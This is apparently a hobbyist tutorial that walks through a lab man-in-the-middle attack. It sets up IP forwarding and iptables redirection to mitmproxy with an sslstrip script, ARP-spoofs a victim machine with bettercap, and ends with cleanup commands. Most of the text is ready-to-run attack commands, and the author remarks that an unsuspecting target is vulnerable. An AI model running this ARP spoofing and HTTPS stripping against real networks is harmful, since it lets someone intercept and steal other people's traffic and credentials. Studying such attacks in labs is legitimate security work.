Hook the attack machine (which I’ll call BlackArch) and the victim machine (which I’ll call Alice) to the same network. I did this in testing by having both of them in a Bridged network configuration under my phone’s hotspot. Safe and Secure®.
We’ll need to setup some IP forwarding and redirection first.
$ sysctl -w net.ipv4.ip_forward=1 $ sysctl -w net.ipv6.conf.all.forwarding=1 $ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 $ iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080 $ ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 $ ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
mitmproxy will take care of the rest
$ mitmproxy --mode transparent --showhost -s sslstrip.py # -- showhost will show the host in the URL display
Okay, we have ip forwarding setup. We’ve got redirection to port 8080 (mitmproxy port). And we have a proxy setup to intercept anything going there (HTTP and HTTPS).
sslstrip.py script is there to strip-out HTTPS headers during a redirection. It’s not ideal for navigating in-between the pages, but an unsuspecting target will be vulnerable. Download it from here.
If you’re doing this locally (not to a remote target) for the purposes of dynamic analysis or whatever, don’t use
sslstrip.py and navigate to mitm.it AFTER the arp spoofing step to install mitmproxy’s SSL certificates
NOTE: you can actually setup a proxy with Bettercap’s
https.proxy modules. I love it and it works like magic, but I’d rather have one tool do one thing. To be frank, I would even use Burp as the proxy instead, but I prefer
mitmproxy since its CLI-based and works in a pinch.
Install and run
Bettercap on BlackArch.
Conduct a small nmap scan to figure out what’s Alice’s IP. Let’s say we found out it’s
Conduct the ARP spoof:
> $ sudo bettercap -iface enp0s3 > >> net.recon off # Disable net.recon modules > >> set arp.spoof.target 10.10.10.4; arp.spoof on; > >> set net.sniff.local true # ONLY IF DONE REMOTELY. Since the redirection occurs to my machine, packets are local > >> net.sniff on # Sniff the network, just to know if things are working. > # I won't see any HTTP packets here since I didn't run http.proxy module
If you’re on a local environment (not with a remote Alice), we can run
arp -a on Alice now to see that BlackArch’s MAC address has been duplicated to the gateway as well.
We’re done. If you wanna do any web page replacements, it’s best to be done as a python script and attached with
-s parameter with mitmproxy. Their GitHub page has a lot of examples in examples/ directory.
$ sudo pacman -S libnetfilter_queue libpcap mitmproxy $ go get github.com/bettercap/bettercap
$ sysctl -w net.ipv4.ip_forward=0 $ sysctl -w net.ipv6.conf.all.forwarding=0 $ iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 $ iptables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080 $ ip6tables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 $ ip6tables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080